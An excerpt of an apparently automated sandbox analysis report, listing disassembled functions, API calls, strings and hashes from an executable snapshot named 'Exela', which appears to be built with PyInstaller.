                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressFreeLibraryProc
                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                    • API String ID: 3013587201-537541572
                                                                                                    • Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                    • Instruction ID: 1479b542e1a2af95a6064b22553ed0382c5e96f1f9a9fe4f68f37d8c80ae1959
                                                                                                    • Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                    • Instruction Fuzzy Hash: ED411621B19B3281FA16FB16981A675A391BF48B90FCD8579ED1D47384EF3CE805C360
                                                                                                    Function 00007FF75AE936B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetModuleFileNameW.KERNEL32(?,00007FF75AE93804), ref: 00007FF75AE936E1
                                                                                                    • GetLastError.KERNEL32(?,00007FF75AE93804), ref: 00007FF75AE936EB
                                                                                                      • Part of subcall function 00007FF75AE92C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF75AE93706,?,00007FF75AE93804), ref: 00007FF75AE92C9E
                                                                                                      • Part of subcall function 00007FF75AE92C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF75AE93706,?,00007FF75AE93804), ref: 00007FF75AE92D63
                                                                                                      • Part of subcall function 00007FF75AE92C50: MessageBoxW.USER32 ref: 00007FF75AE92D99
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                    • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                    • API String ID: 3187769757-2863816727
                                                                                                    • Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                    • Instruction ID: f76858c276dbdf7e7f1cb10ce940f0214e8e4bf1483fa9fa06be43151ebf1972
                                                                                                    • Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                    • Instruction Fuzzy Hash: 7521C751B1C76395FA20B724E8177BAA250BF88744FC842B6E55DC25E5EE3CE905C320
                                                                                                    Function 00007FF75AEABACC Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 899 7ff75aeabacc-7ff75aeabaf2 900 7ff75aeabaf4-7ff75aeabb08 call 7ff75aea4f58 call 7ff75aea4f78 899->900 901 7ff75aeabb0d-7ff75aeabb11 899->901 915 7ff75aeabefe 900->915 903 7ff75aeabee7-7ff75aeabef3 call 7ff75aea4f58 call 7ff75aea4f78 901->903 904 7ff75aeabb17-7ff75aeabb1e 901->904 923 7ff75aeabef9 call 7ff75aeaa950 903->923 904->903 906 7ff75aeabb24-7ff75aeabb52 904->906 906->903 909 7ff75aeabb58-7ff75aeabb5f 906->909 912 7ff75aeabb61-7ff75aeabb73 call 7ff75aea4f58 call 7ff75aea4f78 909->912 913 7ff75aeabb78-7ff75aeabb7b 909->913 912->923 918 7ff75aeabb81-7ff75aeabb87 913->918 919 7ff75aeabee3-7ff75aeabee5 913->919 921 7ff75aeabf01-7ff75aeabf18 915->921 918->919 920 7ff75aeabb8d-7ff75aeabb90 918->920 919->921 920->912 924 7ff75aeabb92-7ff75aeabbb7 920->924 923->915 927 7ff75aeabbb9-7ff75aeabbbb 924->927 928 7ff75aeabbea-7ff75aeabbf1 924->928 930 7ff75aeabbe2-7ff75aeabbe8 927->930 931 7ff75aeabbbd-7ff75aeabbc4 927->931 932 7ff75aeabbc6-7ff75aeabbdd call 7ff75aea4f58 call 7ff75aea4f78 call 7ff75aeaa950 928->932 933 7ff75aeabbf3-7ff75aeabc1b call 7ff75aead66c call 7ff75aeaa9b8 * 2 928->933 935 7ff75aeabc68-7ff75aeabc7f 930->935 931->930 931->932 964 7ff75aeabd70 932->964 960 7ff75aeabc38-7ff75aeabc63 call 7ff75aeac2f4 933->960 961 7ff75aeabc1d-7ff75aeabc33 call 7ff75aea4f78 call 7ff75aea4f58 933->961 938 7ff75aeabc81-7ff75aeabc89 935->938 939 7ff75aeabcfa-7ff75aeabd04 call 7ff75aeb398c 935->939 938->939 944 7ff75aeabc8b-7ff75aeabc8d 938->944 952 7ff75aeabd0a-7ff75aeabd1f 939->952 953 7ff75aeabd8e 939->953 944->939 948 7ff75aeabc8f-7ff75aeabca5 944->948 948->939 949 7ff75aeabca7-7ff75aeabcb3 948->949 949->939 954 7ff75aeabcb5-7ff75aeabcb7 949->954 952->953 958 7ff75aeabd21-7ff75aeabd33 GetConsoleMode 952->958 956 7ff75aeabd93-7ff75aeabdb3 ReadFile 953->956 954->939 959 7ff75aeabcb9-7ff75aeabcd1 954->959 962 7ff75aeabdb9-7ff75aeabdc1 956->962 963 7ff75aeabead-7ff75aeabeb6 GetLastError 956->963 958->953 965 7ff75aeabd35-7ff75aeabd3d 958->965 959->939 967 7ff75aeabcd3-7ff75aeabcdf 959->967 960->935 961->964 962->963 969 7ff75aeabdc7 962->969 972 7ff75aeabed3-7ff75aeabed6 963->972 973 7ff75aeabeb8-7ff75aeabece call 7ff75aea4f78 call 7ff75aea4f58 963->973 966 7ff75aeabd73-7ff75aeabd7d call 7ff75aeaa9b8 964->966 965->956 971 7ff75aeabd3f-7ff75aeabd61 ReadConsoleW 965->971 966->921 967->939 976 7ff75aeabce1-7ff75aeabce3 967->976 980 7ff75aeabdce-7ff75aeabde3 969->980 982 7ff75aeabd82-7ff75aeabd8c 971->982 983 7ff75aeabd63 GetLastError 971->983 977 7ff75aeabd69-7ff75aeabd6b call 7ff75aea4eec 972->977 978 7ff75aeabedc-7ff75aeabede 972->978 973->964 976->939 986 7ff75aeabce5-7ff75aeabcf5 976->986 977->964 978->966 980->966 988 7ff75aeabde5-7ff75aeabdf0 980->988 982->980 983->977 986->939 992 7ff75aeabdf2-7ff75aeabe0b call 7ff75aeab6e4 988->992 993 7ff75aeabe17-7ff75aeabe1f 988->993 1001 7ff75aeabe10-7ff75aeabe12 992->1001 996 7ff75aeabe21-7ff75aeabe33 993->996 997 7ff75aeabe9b-7ff75aeabea8 call 7ff75aeab524 993->997 998 7ff75aeabe35 996->998 999 7ff75aeabe8e-7ff75aeabe96 996->999 997->1001 1002 7ff75aeabe3a-7ff75aeabe41 998->1002 999->966 1001->966 1004 7ff75aeabe43-7ff75aeabe47 1002->1004 1005 7ff75aeabe7d-7ff75aeabe88 1002->1005 1006 7ff75aeabe63 1004->1006 1007 7ff75aeabe49-7ff75aeabe50 1004->1007 1005->999 1009 7ff75aeabe69-7ff75aeabe79 1006->1009 1007->1006 1008 7ff75aeabe52-7ff75aeabe56 1007->1008 1008->1006 1010 7ff75aeabe58-7ff75aeabe61 1008->1010 1009->1002 1011 7ff75aeabe7b 1009->1011 1010->1009 1011->999
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: 71330427dde7a49afb2283bb308656113f98e0c66a4f806cd66398b14c9322eb
                                                                                                    • Instruction ID: ac07e26ee97088d2eaade3e0b7c6704b1d9fdec79bbd64e4776d29d5b95a4315
                                                                                                    • Opcode Fuzzy Hash: 71330427dde7a49afb2283bb308656113f98e0c66a4f806cd66398b14c9322eb
                                                                                                    • Instruction Fuzzy Hash: BDC1B4229087A691F760BB15944A2BDB794FF81B80FDD41B1EA4E07791CF7CEC558720
                                                                                                    Function 00007FF75AE98760 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                    • String ID:
                                                                                                    • API String ID: 995526605-0
                                                                                                    • Opcode ID: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
                                                                                                    • Instruction ID: be20ff680414a40a1c3a2d888350e2a7261b9c047fb7ca64d6808bbd15c4e803
                                                                                                    • Opcode Fuzzy Hash: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
                                                                                                    • Instruction Fuzzy Hash: 90218D21A0C75686FB20BB55B45563AE7A0EF817B0F984275EAAC43AF4DE6CD8448720
                                                                                                    Function 00007FF75AE990E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 00007FF75AE98760: GetCurrentProcess.KERNEL32 ref: 00007FF75AE98780
                                                                                                      • Part of subcall function 00007FF75AE98760: OpenProcessToken.ADVAPI32 ref: 00007FF75AE98793
                                                                                                      • Part of subcall function 00007FF75AE98760: GetTokenInformation.KERNELBASE ref: 00007FF75AE987B8
                                                                                                      • Part of subcall function 00007FF75AE98760: GetLastError.KERNEL32 ref: 00007FF75AE987C2
                                                                                                      • Part of subcall function 00007FF75AE98760: GetTokenInformation.KERNELBASE ref: 00007FF75AE98802
                                                                                                      • Part of subcall function 00007FF75AE98760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF75AE9881E
                                                                                                      • Part of subcall function 00007FF75AE98760: CloseHandle.KERNEL32 ref: 00007FF75AE98836
                                                                                                    • LocalFree.KERNEL32(?,00007FF75AE93C55), ref: 00007FF75AE9916C
                                                                                                    • LocalFree.KERNEL32(?,00007FF75AE93C55), ref: 00007FF75AE99175
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                    • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                    • API String ID: 6828938-1529539262
                                                                                                    • Opcode ID: 44a76ac2d965b652da6d7152683ffc914eb32e79e00aec7a7a922ce7c9633e88
                                                                                                    • Instruction ID: 4e7f5d265aa20896c0918edc79173f9221289376d1e535c219868d27e5422382
                                                                                                    • Opcode Fuzzy Hash: 44a76ac2d965b652da6d7152683ffc914eb32e79e00aec7a7a922ce7c9633e88
                                                                                                    • Instruction Fuzzy Hash: 04218221A0875689FB10BB21E55A7EAA364FF88780FC840B1EA4D53796DF3CD8058760
                                                                                                    Function 00007FF75AE97E10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateDirectoryW.KERNELBASE(00000000,?,00007FF75AE9352C,?,00000000,00007FF75AE93F23), ref: 00007FF75AE97F22
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateDirectory
                                                                                                    • String ID: %.*s$%s%c$\
                                                                                                    • API String ID: 4241100979-1685191245
                                                                                                    • Opcode ID: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
                                                                                                    • Instruction ID: dd085833ae2f05d1ae0ac13684e8d97cda65f1ae91378401cd904a5af3ab2d01
                                                                                                    • Opcode Fuzzy Hash: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
                                                                                                    • Instruction Fuzzy Hash: 6531D621619BD549FB21BB20A852BEAA354EF84BE4F880270EE6D437C9DE2CD6458710
                                                                                                    Function 00007FF75AEACFD0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF75AEACFBB), ref: 00007FF75AEAD0EC
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF75AEACFBB), ref: 00007FF75AEAD177
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ConsoleErrorLastMode
                                                                                                    • String ID:
                                                                                                    • API String ID: 953036326-0
                                                                                                    • Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                    • Instruction ID: 66e33b65c9d276d9da9fc486a93bc7c2f23f94217e81deb88309e111fece70b2
                                                                                                    • Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                    • Instruction Fuzzy Hash: BC91C672F1866189F750BF65948A3BDABA0EF54B88F9C41B9DE0E57684CE38D442C730
                                                                                                    Function 00007FF75AEAF9FC Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _get_daylight$_isindst
                                                                                                    • String ID:
                                                                                                    • API String ID: 4170891091-0
                                                                                                    • Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                    • Instruction ID: af05e71ef9e4618fa9eab05f9e849d0bbcaf2a687110582b9dfdf8ffbd08dd8c
                                                                                                    • Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                    • Instruction Fuzzy Hash: 4E510B73F042218AFB14FF24D96A6BCA7A1AF40358F984275DD1E52AE5DF38A402C710
                                                                                                    Function 00007FF75AEA57EC Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                    • String ID:
                                                                                                    • API String ID: 2780335769-0
                                                                                                    • Opcode ID: 6433626fc0a770ba4f6d83c09f3326f67990d509dea1b3a303c7df294cc1bd66
                                                                                                    • Instruction ID: d246f313e1b196996d780b106dff7ea72baf14baad370b1b14def19028b6aeb0
                                                                                                    • Opcode Fuzzy Hash: 6433626fc0a770ba4f6d83c09f3326f67990d509dea1b3a303c7df294cc1bd66
                                                                                                    • Instruction Fuzzy Hash: CF51AD22E087618AFB10FF71D45A3BDA3A1BF48B58F988575DE0D5B688DF38D4428720
                                                                                                    Function 00007FF75AEA5698 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279662727-0
                                                                                                    • Opcode ID: 24238bc47b860f74abc13910c6a37bc7991964e3dbe0c30fb6d15975fbdc4001
                                                                                                    • Instruction ID: 1b27b1b376e12331efcd963d3d0276092d520de5a1136c021d3708d197bb6d75
                                                                                                    • Opcode Fuzzy Hash: 24238bc47b860f74abc13910c6a37bc7991964e3dbe0c30fb6d15975fbdc4001
                                                                                                    • Instruction Fuzzy Hash: E341C422D1879283F350BB20961A379A360FF94764F549375EA9C03AD2DF7CA5E18720
                                                                                                    Function 00007FF75AE9CCAC Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                    • String ID:
                                                                                                    • API String ID: 3251591375-0
                                                                                                    • Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                    • Instruction ID: 44aaf1e4e1737e217bb3da66a54c00683d13b118261384aea55578a273af45da
                                                                                                    • Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                    • Instruction Fuzzy Hash: CD313B21E083734DFA64BB259467BB9A791AF81384FCC44B4D94E672D3DE2CA805C271
                                                                                                    Function 00007FF75AEA9AA0 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                    • String ID:
                                                                                                    • API String ID: 1703294689-0
                                                                                                    • Opcode ID: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
                                                                                                    • Instruction ID: fea1776a34e1a753359ab11cf083ecdcdcffef3678773178f7f852b2f1373dec
                                                                                                    • Opcode Fuzzy Hash: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
                                                                                                    • Instruction Fuzzy Hash: 6DD09210B1876A42FB183B745C9F17DA255AF48B41F9C55F9C80B0A3A3ED7CA8498320
                                                                                                    Function 00007FF75AEA01AC Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                    • Instruction ID: d606099b4e6e67df70ef816ca1599a51ed9bd395bbdcec814ad5e0d787070884
                                                                                                    • Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                    • Instruction Fuzzy Hash: 35512821B0926246F766BE29940A67AE3C1AF44BA4F9C4774DE6D077C6CF3CD5018630
                                                                                                    Function 00007FF75AEAC1A4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
